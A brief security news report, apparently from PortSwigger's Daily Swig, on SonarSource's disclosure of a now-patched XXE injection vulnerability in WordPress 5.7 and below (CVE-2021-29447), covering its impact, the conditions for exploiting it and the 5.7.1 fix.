An XML External Entity (XXE) injection bug in WordPress could allow attackers to remotely steal a victim’s files, researchers have revealed.
Security researchers at SonarSource who discovered the vulnerability published a blog post today (April 27) that provides technical details on the now-patched bug.
An XXE vulnerability allows an attacker to interfere with an application’s processing of XML data. This can enable them to view files on the application server filesystem and interact with any back-end or external systems that the application itself can access.
In this case, the XXE bug was present in WordPress versions 5.7 and below, and could allow for remote arbitrary file disclosure and server-side request forgery (SSRF).
Restrictions
The blog post caveats that this issue is only present in systems running affected WordPress installations on PHP 8.
Additionally, the permissions to upload media files are needed,” SonarSource researchers explained in the blog post.
“On a standard WordPress installation this translates to having author privileges. However, combined with another vulnerability or a plugin allowing visitors to upload media files, it could be exploited with lower privileges.”
The researchers disclosed the code vulnerability to the WordPress security team, who fixed it in the latest version (5.7.1) and assigned CVE-2021-29447.
Fix
WordPress, the world’s most popular content management software, powers around 40% of all websites in use, making it a clear target for malicious actors.
Fortunately, thanks to ongoing security work from the maintainers of the open source CMS framework, many sites running WordPress will now auto-update.
Web admins who do not have this feature enabled can update via their WordPress admin dashboard.
Source: https://portswigger.net/daily-swig/wordpress-xxe-injection-vulnerability-could-allow-attackers-to-remotely-steal-host-files